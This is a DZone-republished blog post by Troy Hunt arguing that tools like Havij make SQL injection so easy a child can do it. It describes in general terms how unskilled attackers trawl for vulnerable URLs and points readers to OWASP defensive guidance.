SQL Zone is brought to you in partnership with:

Troy Hunt is a Software Architect and Microsoft MVP for Developer Security. He blogs regularly about security principles in software development at troyhunt.com and is the author of the OWASP Top 10 for .NET developers series and free eBook of the same name. Troy is also the creator of the recently released Automated Security Analyser for ASP.NET Websites at asafaweb.com. Troy is a DZone MVB and is not an employee of DZone and has posted 59 posts at DZone. You can read more from them at their website. View Full User Profile

Hacking is Child's Play: How My 3 Year Old Performed a SQL Injection w/ Havij

10.15.2012
| 8355 views |
  • submit to reddit
You know what really strikes me about a lot of the hacks we’ve seen lately? It just seems too easy. I mean we’re seeing a huge number of attacks (an unprecedented number, by some figures) and all too often the perpetrator is a kid. I don’t mean that in a relative sense to myself as I get older, I mean literally a child.

The problem, of course, is that many of these “hacks” have become simple point and shoot affairs using freely available tools. In the case of SQL injection, tools such as Havij mean that even if you don’t know your indexes from your collations or your UDFs from your DMVs, so long as you can copy and paste a URL you can be an instant “hacker”.

In fact I reckon it’s so easy that even my 3 year old can be a successful hacker. Turns out that’s not too far from the truth:

See how easy it is? Let’s move on and let me give you some more context around the ease and prevalence of these attacks. Firstly, remember that injection remains in the number one spot in the OWASP Top 10. What makes SQLi particularly dangerous is that it’s classified as both “easy” to exploit (which I think we can now all agree on) and with an impact of “severe”.

How severe? As in the example above, SQLi can readily be used to access stored credentials in a vulnerable site and even though these were salted and hashed, they’ll easily fall victim to a brute force attack. Last year it was SQLi which brought down Sony Pictures and it was also allegedly SQLi that was behind this year’s LinkedIn breach. It is very, very prevalent.

A quick look through YouTube and you’ll see tutorials such as SQL Injecting With Havij which is notable not for its content, but rather for its presenter. As well as the guy sounding like he’s about 15 years old, it’s also clear he has very little idea of what a SQL database is or even how Havij actually works. This isn’t a criticism of the kid per se, it’s simply an observation about how accessible tools like Havij are. YouTube is littered with similar examples.

Now keep in mind that Havij is a tool that “helps penetration testers” and indeed ITSecTeam who makes the product is a legitimate security firm. But – and this is a big “but” – do a quick search on YouTube and you won’t find too many videos from penetration testers nor will you find many comments from people with a vocab broader than Ari’s. No, these are kids just looking to smash and grab whatever they can from vulnerable websites.

Of course Havij isn’t the only tool of this kind, products like sqlmap are also extremely popular and in this case, also open source. Unlike Havij it’s purely command line based (probably a bit trickier for a 3 year old who can’t read yet), and also unlike Havij the audience commentating on it via YouTube and other forums is a little more, well, mature.

It’s interesting to look at the modus operandi of how these tools are being used. In this video about How To Use Havij we’re first shown how to unlock the Pro version with a cracked key then how the author has a list of “Dorks” – clearly Google Dorks – with potentially vulnerable URL patterns. This amounts to nothing more than URLs with a query string called “ID”. These guys are simply trawling the internet, pointing Havij at potentially vulnerable URLs and giving it a shot. When it doesn’t work they’ll just move onto the next one.

And that’s the final bit of insight I’ll leave you with; being a target doesn’t mean being a large multinational or supporting a cause that doesn’t sit well with hacktivists nor does it mean presenting some sort of financial upside to those who can break through your security. No, being a target means being on the internet. End of story.

For those looking to protect their applications from SQLi, take a look at the first part of my series on the OWASP Top 10 for .NET developers: Injection.

Published at DZone with permission of Troy Hunt, author and DZone MVB. (source)

(Note: Opinions expressed in this article and its replies are the opinions of their respective authors and not those of DZone, Inc.)